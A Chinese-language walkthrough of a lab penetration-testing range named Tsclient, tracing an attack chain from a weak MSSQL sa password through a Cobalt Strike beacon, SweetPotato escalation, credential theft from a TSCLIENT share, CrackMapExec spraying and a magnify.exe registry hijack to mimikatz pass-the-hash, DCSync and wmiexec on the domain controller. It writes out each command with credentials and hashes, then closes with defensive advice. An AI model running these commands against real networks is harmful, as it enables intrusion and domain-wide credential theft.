春秋云镜-Tsclienet

字数 1243 2025-08-23 18:31:25

春秋云镜-Tsclient渗透测试实战教学文档

1. 信息收集阶段

1.1 初始扫描

使用fscan扫描发现目标系统(121.89.199.183)存在MSSQL服务
扫描结果爆出MSSQL密码: sa:'1qaz!QAZ'

1.2 MSSQL服务利用

使用impacket-mssqlclient连接:

impacket-mssqlclient sa:'1qaz!QAZ'@121.89.199.183

发现xp_cmdshell被禁用，无法直接执行系统命令

2. 文件上传与初始访问

2.1 使用MDUT工具

下载MDUT工具(类似impacket-mssqlclient但支持文件上传)
上传CS(Covert Strike)木马
成功上线但权限较低

2.2 提权操作

使用SweetPotato进行提权:

shell c:\users\public\sweetpotato.exe -a whoami

以最高权限运行CS木马:

shell C:\Users\Public\SweetPotato.exe -a C:\Users\Public\beacon_x64.exe

获取第一个flag:

flag{f61edeff-5177-40cb-b8fd-4490a483f0df}

3. 横向移动与用户会话利用

3.1 信息收集

查看所有用户:
```
shell net user
```
查看在线用户:
```
shell quser || qwinst
```
发现John用户在线，通过CS插件注入John用户的进程

3.2 共享资源利用

挂载远程共享资源:
```
shell net use
```
读取共享文件获取凭据:
```
shell type \\TSCLIENT\C\credential.txt
```
获取到凭据: xiaorang.lab\Aldrich:Ald@rLMWuy7Z!#

4. 网络拓扑发现

4.1 内网扫描

查看本机IP:
```
shell ipconfig
```
使用fscan扫描内网:
```
shell C:\\Users\\Public\\fscan.exe -h 172.22.8.0/24
```
发现多台存活主机，包括域控DC01(172.22.8.15)

4.2 代理设置

使用CS建立socks4代理(因socks5需要身份验证)

5. 密码喷射与凭据利用

5.1 CrackMapExec测试

proxychains -q crackmapexec smb 172.22.8.0/24 -u 'Aldrich' -p 'Ald@rLMWuy7Z!#'

发现172.22.8.46可登录但密码已过期

5.2 密码修改

proxychains -q python3 impacket-master/examples/smbpasswd.py xiaorang.lab/Aldrich:'Ald@rLMWuy7Z!#'@172.22.8.15 -newpass 'csy666zz!'

6. 不出网主机上线

生成转发监听器
创建对应exe在不出网主机运行
通过转发上线

7. 映像劫持提权

7.1 检查注册表权限

get-acl -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl *

发现NT AUTHORITY\Authenticated Users有修改权限

7.2 修改注册表

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

锁定计算机后使用放大镜功能
获得system权限cmd

运行CS木马获取第二个flag:

flag{25e1588d-28a6-4269-8fab-aa0a0202ea24}

8. 域控攻陷

8.1 域管信息收集

net group "domain admins" /domain

发现WIN2016$在域管组中

8.2 哈希传递攻击

使用mimikatz:

C:\Users\Aldrich\Desktop\mimikatz.exe "privilege::debug" "sekurlsa::pth /user:WIN2016$ /domain:xiaorang.lab /ntlm:b1b840a5c19c4290a284204df50126a6" "exit"

8.3 DCSync攻击

C:\Users\Aldrich\Desktop\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit"

获取Administrator的NTLM哈希: 2c9d81bdcf3ec8b1def10328a7cc2f08

8.4 WMI执行

proxychains impacket-wmiexec -hashes 00000000000000000000000000000000:2c9d81bdcf3ec8b1def10328a7cc2f08 Administrator@172.22.8.15

获取第三个flag:

flag{51a7b5a1-da5c-4198-9dcc-d2a52699af6c}

关键工具与技术总结

扫描工具: fscan
MSSQL利用: impacket-mssqlclient, MDUT
提权工具: SweetPotato
横向移动: CrackMapExec, impacket套件
哈希攻击: mimikatz (pth, dcsync)
权限维持: 映像劫持
C2框架: Cobalt Strike

防御建议

加强MSSQL账户密码复杂度
限制xp_cmdshell等危险存储过程
监控注册表关键位置修改
限制域内机器账户权限
启用LSA保护防止凭据窃取
监控异常网络共享访问
实施网络分段限制横向移动

春秋云镜-Tsclient渗透测试实战教学文档 1. 信息收集阶段 1.1 初始扫描使用fscan扫描发现目标系统(121.89.199.183)存在MSSQL服务扫描结果爆出MSSQL密码: sa:'1qaz!QAZ' 1.2 MSSQL服务利用使用impacket-mssqlclient连接: 发现xp_ cmdshell被禁用，无法直接执行系统命令 2. 文件上传与初始访问 2.1 使用MDUT工具下载MDUT工具(类似impacket-mssqlclient但支持文件上传) 上传CS(Covert Strike)木马成功上线但权限较低 2.2 提权操作使用SweetPotato进行提权: 以最高权限运行CS木马: 获取第一个flag: 3. 横向移动与用户会话利用 3.1 信息收集查看所有用户: 查看在线用户: 发现John用户在线，通过CS插件注入John用户的进程 3.2 共享资源利用挂载远程共享资源: 读取共享文件获取凭据: 获取到凭据: xiaorang.lab\Aldrich:Ald@rLMWuy7Z!# 4. 网络拓扑发现 4.1 内网扫描查看本机IP: 使用fscan扫描内网: 发现多台存活主机，包括域控DC01(172.22.8.15) 4.2 代理设置使用CS建立socks4代理(因socks5需要身份验证) 5. 密码喷射与凭据利用 5.1 CrackMapExec测试发现172.22.8.46可登录但密码已过期 5.2 密码修改 6. 不出网主机上线生成转发监听器创建对应exe在不出网主机运行通过转发上线 7. 映像劫持提权 7.1 检查注册表权限发现 NT AUTHORITY\Authenticated Users 有修改权限 7.2 修改注册表锁定计算机后使用放大镜功能获得system权限cmd 运行CS木马获取第二个flag: 8. 域控攻陷 8.1 域管信息收集发现 WIN2016$ 在域管组中 8.2 哈希传递攻击使用mimikatz: 8.3 DCSync攻击获取Administrator的NTLM哈希: 2c9d81bdcf3ec8b1def10328a7cc2f08 8.4 WMI执行获取第三个flag: 关键工具与技术总结扫描工具 : fscan MSSQL利用 : impacket-mssqlclient, MDUT 提权工具 : SweetPotato 横向移动 : CrackMapExec, impacket套件哈希攻击 : mimikatz (pth, dcsync) 权限维持 : 映像劫持 C2框架 : Cobalt Strike 防御建议加强MSSQL账户密码复杂度限制xp_ cmdshell等危险存储过程监控注册表关键位置修改限制域内机器账户权限启用LSA保护防止凭据窃取监控异常网络共享访问实施网络分段限制横向移动